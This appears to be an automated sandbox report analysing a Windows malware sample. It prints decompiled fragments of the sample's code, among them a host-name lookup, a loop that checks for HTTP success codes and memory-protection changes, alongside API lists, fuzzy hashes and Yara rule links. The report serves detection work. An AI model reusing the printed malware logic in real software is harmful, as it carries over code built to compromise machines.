Uniqueness Score: -1.00%

Function 004013C4, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004013C4() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x403104;
				if( *0x4030ec > 5) {
					_t16 = _t15 + 0x4040f9;
				} else {
					_t16 = _t15 + 0x4040b1;
				}
				E0040136F(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E00401862( &_v32,  &_v16,  *0x403100 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x4030f8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E00401E22(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x4030f8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E00401EF4(_t44, _t32 + 4);
						}
					}
					_t25 = E00401D7E(_v28); // executed
				}
				ExitThread(_t25);
			}

0x004013ca
0x004013db
0x004013e5
0x004013dd
0x004013dd
0x004013dd
0x004013ec
0x004013f5
0x004013fa
0x00401418
0x00401474
0x0040141a
0x00401420
0x00401426
0x00401434
0x00401438
0x0040143f
0x00401448
0x0040144c
0x00401452
0x00401463
0x00401454
0x0040145a
0x0040145a
0x00401452
0x0040146b
0x0040146b
0x00401476

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 00401420
ExitThread.KERNEL32 ref: 00401476

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 92b9446ae56c0096a6d51e073f835bbe8f5f7c68a162cf9a1ffdb1302b28142d
Instruction ID: 81bba9c2c985b02d9343bb148b21bee0e14b39adfd693302f6ca951fdd028e92
Opcode Fuzzy Hash: 92b9446ae56c0096a6d51e073f835bbe8f5f7c68a162cf9a1ffdb1302b28142d
Instruction Fuzzy Hash: 4811AC72104201AAE711DB65CD49E9B77ECAB44308F00883AB505F71F0EB34EA058B5A

Uniqueness

Uniqueness Score: -1.00%

Function 03C44841, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 03C44868

Part of subcall function 03C476E7: SysFreeString.OLEAUT32(?), ref: 03C477C6

SafeArrayDestroy.OLEAUT32(?), ref: 03C448B8

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID:
API String ID: 3098518882-0
Opcode ID: a0c8820211f2c0f7df12bf72e052cd0ce0c54a5212b642e6096a23498f2a0fd0
Instruction ID: dd8e64a74fe2f0f03090edce739e986f0478579bc3fe8ae6d61614b00f39aa6e
Opcode Fuzzy Hash: a0c8820211f2c0f7df12bf72e052cd0ce0c54a5212b642e6096a23498f2a0fd0
Instruction Fuzzy Hash: 64116176900209BFDB11EFA9D804EEEB7B9EF08350F018165FA04E7161E7719A15DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03C45D79, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C45D79(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E03C47DDD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x3c4d238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E03C41037(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x03c45d79
0x03c45d81
0x03c45d98
0x03c45db3
0x03c45db7
0x03c45dbc
0x03c45dbe
0x03c45dd0
0x03c45ddc
0x03c45dc0
0x03c45dc0
0x03c45dc5
0x03c45dca
0x03c45dca
0x03c45dbe
0x03c45de2
0x03c45de6
0x03c45de6
0x03c45d8d
0x03c45d92
0x03c45d96
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 03C41037: SysFreeString.OLEAUT32(00000000), ref: 03C4109A

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,03C45356,?,004F0053,048F9368,00000000,?), ref: 03C45DDC

Strings

Ut, xrefs: 03C45DDC

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$HeapString
String ID: Ut
API String ID: 3806048269-8415677
Opcode ID: a95f92c20e2d8c31fc9226fcaf08abae8e736f8e3b2d0f7a67bc7d2e06732371
Instruction ID: 5fa4788105bfca533572acdc65b94dcea22a03cf0cd827740943cef49ca8e12e
Opcode Fuzzy Hash: a95f92c20e2d8c31fc9226fcaf08abae8e736f8e3b2d0f7a67bc7d2e06732371
Instruction Fuzzy Hash: B6012836100619BBCB22DE54CC04FEE7B65EF04790F098025FA09DE120D731DA60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 03C44ABF, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(03C45C8D), ref: 03C44AD8

Part of subcall function 03C476E7: SysFreeString.OLEAUT32(?), ref: 03C477C6

SysFreeString.OLEAUT32(00000000), ref: 03C44B19

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: c1372b788934ebe48c0ca9cf3db998f6c0b6a84e90b2304ae1e5b2bc693a5c7f
Instruction ID: 145c2acba102bffa557943f61049db754f4b37e553effddc3e43429730ebd14b
Opcode Fuzzy Hash: c1372b788934ebe48c0ca9cf3db998f6c0b6a84e90b2304ae1e5b2bc693a5c7f
Instruction Fuzzy Hash: 25016D7651110ABFCB45EFA9D808EAFBBB9FF48710B014122FA05E7120E7309E15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03C4831C, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E03C4831C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E03C41525(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E03C48B22(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x03c48321
0x03c4832c
0x03c4832e
0x03c48334
0x03c48336
0x03c4833b
0x03c48344
0x03c48348
0x03c48351
0x03c48355
0x03c48364
0x03c48357
0x03c48358
0x03c4835d
0x03c4835d
0x03c48355
0x03c48348
0x03c4836d

APIs

GetComputerNameExA.KERNEL32(00000003,00000000,03C49C7E,74E5F710,00000000,?,?,03C49C7E), ref: 03C48334

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

GetComputerNameExA.KERNEL32(00000003,00000000,03C49C7E,03C49C7F,?,?,03C49C7E), ref: 03C48351

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: bbf35a5fe29d583569ed88ee4d6cfa9fc687966343d00530c2b117941af07311
Instruction ID: f76f46e8ad672d204bf8a0c80fcec1b77aad4da3247676dcaa242a40d2660ec2
Opcode Fuzzy Hash: bbf35a5fe29d583569ed88ee4d6cfa9fc687966343d00530c2b117941af07311
Instruction Fuzzy Hash: 1FF05466600305BEEB21D69E8C00EAF76FCEBC5660F150055A504E7144EA71DF019770

Uniqueness

Uniqueness Score: -1.00%

Function 03C48DAB, Relevance: 3.0, APIs: 2, Instructions: 35
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C48DAB(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E03C41525(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0x3c4d2a8; // 0xcaa5a8
					_t5 = _t11 + 0x3c4ea48; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0x3c4d2a8; // 0xcaa5a8
					_t6 = _t14 + 0x3c4e8f8; // 0x6d0063
					_t16 = E03C48B7B(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E03C48B22(_t20);
				}
				return _t18;
			}

0x03c48dc1
0x03c48dc5
0x03c48e05
0x03c48dc7
0x03c48dcb
0x03c48dd2
0x03c48dda
0x03c48de0
0x03c48deb
0x03c48df4
0x03c48dfa
0x03c48dfc
0x03c48dfc
0x03c48e0a

APIs

lstrlenW.KERNEL32(74E5F710,00000000,00000001,03C4993E,00000005,?,74E5F710,00000000,74E5F730,?,?,?,03C47D37,?,00000001,?), ref: 03C48DB1

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

wsprintfW.USER32 ref: 03C48DDA

Part of subcall function 03C48B7B: memset.NTDLL ref: 03C48B9E
Part of subcall function 03C48B7B: GetLastError.KERNEL32 ref: 03C48BEA

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
String ID:
API String ID: 1672627171-0
Opcode ID: db4c6a8f03565c4e86560c410de4ed0eeb918dfeff667c0542084215a6247353
Instruction ID: 3216539303e0d7e32330fff1b3d96699b1fa4f82aa8eccebbbcb6f0a359c9ae3
Opcode Fuzzy Hash: db4c6a8f03565c4e86560c410de4ed0eeb918dfeff667c0542084215a6247353
Instruction Fuzzy Hash: BBF0B47A600310BFD610FB28EC48F9B77ADEF84210F074551FA11DB215CB31D9418BA1

Uniqueness

Uniqueness Score: -1.00%

Function 03C47EFD, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x3c4d23c) == 0) {
						E03C44DB1();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x3c4d23c) == 1) {
						_t10 = E03C42789(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x03c47f04
0x03c47f05
0x03c47f08
0x03c47f3a
0x03c47f3c
0x03c47f3c
0x03c47f0a
0x03c47f0b
0x03c47f20
0x03c47f27
0x03c47f29
0x03c47f29
0x03c47f27
0x03c47f0b
0x03c47f44

APIs

InterlockedIncrement.KERNEL32(03C4D23C), ref: 03C47F12

Part of subcall function 03C42789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,03C47F25,?), ref: 03C4279C

InterlockedDecrement.KERNEL32(03C4D23C), ref: 03C47F32

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: c84b86fcd0cb92eb8d6dd1c2fb186b538f4919fe8bcbfd58d8043e68b889b884
Instruction ID: 7ff49a7780a66215765ca2b78eb8305eb190d884926a747f072a17e505e45b3a
Opcode Fuzzy Hash: c84b86fcd0cb92eb8d6dd1c2fb186b538f4919fe8bcbfd58d8043e68b889b884
Instruction Fuzzy Hash: 93E08635208332A7EB35F675DC48B6EA6549B10780F0A94A4F4B2D9055D711CD6092D5

Uniqueness

Uniqueness Score: -1.00%

Function 03C4A224, Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E03C4A224(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x3c4d238, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}

0x03c4a229
0x03c4a22e
0x03c4a23c
0x03c4a242
0x03c4a246
0x03c4a2b7
0x03c4a248
0x03c4a24c
0x03c4a24f
0x03c4a252
0x03c4a259
0x03c4a25a
0x03c4a25b
0x03c4a25d
0x03c4a262
0x03c4a269
0x03c4a26f
0x03c4a270
0x03c4a270
0x03c4a277
0x03c4a278
0x03c4a279
0x03c4a27d
0x03c4a289
0x03c4a28f
0x03c4a290
0x03c4a290
0x03c4a292
0x03c4a298
0x03c4a29a
0x03c4a29f
0x03c4a2a0
0x03c4a2a0
0x03c4a2a6
0x03c4a2af
0x03c4a2b1
0x03c4a2b4
0x03c4a2c3

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 03C4A23C

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ce5db3ca56bdae56ebf45a5c5957815d73531c525866ed6dc8512b4a1a7feb9e
Instruction ID: 3f8e35806fbc46de3f6c10045a4ec98a8c313ddde938224edf720750ae291168
Opcode Fuzzy Hash: ce5db3ca56bdae56ebf45a5c5957815d73531c525866ed6dc8512b4a1a7feb9e
Instruction Fuzzy Hash: 1B11E7352852419FEB158F29D451BE9BBA9DB53218F18408AE444CF292C2779A0BC760

Uniqueness

Uniqueness Score: -1.00%

Function 03C4933A, Relevance: 1.6, APIs: 1, Instructions: 70
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C4933A(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x3c4d2c8; // 0x48f9618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E03C48C01( &_v68) == 0) {
						goto L16;
					}
					_t30 = E03C497F7(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E03C45988(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E03C4D000 = E03C4D000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E03C458DB( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x3c4d26c, 0) == 0x102);
				return _t30;
			}

0x03c4933a
0x03c49340
0x03c49347
0x03c4934f
0x03c49355
0x03c49358
0x03c4935a
0x03c4935a
0x03c49362
0x03c49362
0x03c4936c
0x00000000
0x00000000
0x03c4937b
0x03c4937f
0x03c49383
0x03c49388
0x03c4938c
0x03c493c8
0x03c493ca
0x03c493ca
0x03c4938e
0x03c49395
0x03c493bf
0x03c49397
0x03c49397
0x03c4939c
0x03c493b8
0x03c4939e
0x03c4939e
0x03c493a3
0x03c493a8
0x03c493ab
0x03c493ad
0x03c493b2
0x03c493b4
0x03c493b4
0x03c493b2
0x03c493a3
0x03c4939c
0x03c49395
0x03c4938c
0x03c493d7
0x03c493dc
0x03c493dc
0x03c49400

APIs

WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 03C493EC

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: cef0390ae92ee543b84c1ba43c9a3bb67a8fd53bc0a0f08467144ce6c164307d
Instruction ID: 5c30bb3ada5c8be71f8b33592b945ef6ca2d30b00a292fbdc31442b89124f5a7
Opcode Fuzzy Hash: cef0390ae92ee543b84c1ba43c9a3bb67a8fd53bc0a0f08467144ce6c164307d
Instruction Fuzzy Hash: 2521903A7002299BDF11EE59D854B6FB7B5AB82364F194125E402EF2D0EB70DD41C750

Uniqueness

Uniqueness Score: -1.00%

Function 03C41037, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E03C41037(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x3c4d2a8; // 0xcaa5a8
				_t4 = _t15 + 0x3c4e39c; // 0x48f8944
				_t20 = _t4;
				_t6 = _t15 + 0x3c4e124; // 0x650047
				_t17 = E03C476E7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E03C47EA4(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x03c41041
0x03c41048
0x03c41049
0x03c4104a
0x03c4104b
0x03c41051
0x03c41056
0x03c41056
0x03c41060
0x03c41072
0x03c41079
0x03c410a7
0x03c4107b
0x03c4107d
0x03c41082
0x03c410a4
0x03c41084
0x03c41087
0x03c4108e
0x03c41093
0x03c41095
0x03c41095
0x03c4109a
0x03c4109a
0x03c41082
0x03c410ae

APIs

Part of subcall function 03C476E7: SysFreeString.OLEAUT32(?), ref: 03C477C6

Part of subcall function 03C47EA4: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,03C451D4,004F0053,00000000,?), ref: 03C47EAD
Part of subcall function 03C47EA4: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,03C451D4,004F0053,00000000,?), ref: 03C47ED7
Part of subcall function 03C47EA4: memset.NTDLL ref: 03C47EEB

SysFreeString.OLEAUT32(00000000), ref: 03C4109A

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 4baec0771b141291eca8646083a3948d97fd8bef29f67925d7b19979ea5c8b71
Instruction ID: ca29436b4b19cbca894d3e1c007738ec249dc79fc11170b5057f6f2d5fdd4932
Opcode Fuzzy Hash: 4baec0771b141291eca8646083a3948d97fd8bef29f67925d7b19979ea5c8b71
Instruction Fuzzy Hash: 8601BC36900119BFDB12EFAACC00EAABBB9FB04240F054166EE40E7020E371AD51C790

Uniqueness

Uniqueness Score: -1.00%

Function 021BC8E5, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 021BC92D

Memory Dump Source

Source File: 00000000.00000002.510206114.00000000021B9000.00000040.00000001.sdmp, Offset: 021B9000, based on PE: false

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: cf20cc3ffc53e57dd075be20b2f51705e1b6eaa5259eb89c932e1dddbe263046
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 51F0F6312403146FE7213FF9988CBEE72FCAF4D724F10052AE642D10C0DB70E8058AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419DEC, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00419E4A

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 141070658d78ade838dcfdee5f25a4b0fae43cdc9ca8b4750ae202ba536ad394
Instruction ID: 4318d3e4027a442d59a62c253b632e1caf09adc79d80ccfff0910ffa34149225
Opcode Fuzzy Hash: 141070658d78ade838dcfdee5f25a4b0fae43cdc9ca8b4750ae202ba536ad394
Instruction Fuzzy Hash: CB0128B5A00108EBDB04DFA8D995A9E73B5AB88310F10C659F91C8B280D734EE51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0042E880, Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(01FB4154,01FB4264,00000040,?,?,0042F9D3), ref: 0042E921

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 21b2eb115780f8f755bea786591107e51b3c11ed56d56979a505a8717f1d3bf5
Instruction ID: e07aca121ccc40ba106822e51aad963f5f3a5e894a99e07b21b5e4b59d60448a
Opcode Fuzzy Hash: 21b2eb115780f8f755bea786591107e51b3c11ed56d56979a505a8717f1d3bf5
Instruction Fuzzy Hash: BC0128B1208284EED301CF64BE86B563BB4EF95707F20712DE0465B2B5DB756604DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040136F, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040136F(void* __eax, intOrPtr _a4) {

				 *0x403110 =  *0x403110 & 0x00000000;
				_push(0);
				_push(0x40310c);
				_push(1);
				_push(_a4);
				 *0x403108 = 0xc; // executed
				L00401746(); // executed
				return __eax;
			}

0x0040136f
0x00401376
0x00401378
0x0040137d
0x0040137f
0x00401383
0x0040138d
0x00401392

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013F1,00000001,0040310C,00000000), ref: 0040138D

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 1a6a7a0cbcb211806d4e421c93ccdd2d337a60f7500ba4ce8895fb39eafca520
Instruction ID: 17493d3f587428f8fefc298e6e1fa5166c11f7a8d69dd9124bb4eb41bc27f639
Opcode Fuzzy Hash: 1a6a7a0cbcb211806d4e421c93ccdd2d337a60f7500ba4ce8895fb39eafca520
Instruction Fuzzy Hash: 53C04C74144310A7E6109F009D46F457E557759706F204529B1103D1E183F95254895D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BC20, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,?,00418A6B,?,?,0041BD90), ref: 0041BC27

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 571b9a346ba3aee5e7162d8b2e84ff0133bcd04bd6d1b186cd33ff8b2d1303b9
Instruction ID: beb10af768bc00d8512f6c99a640e2b6363bc314257fc85a41fc2293c32fde15
Opcode Fuzzy Hash: 571b9a346ba3aee5e7162d8b2e84ff0133bcd04bd6d1b186cd33ff8b2d1303b9
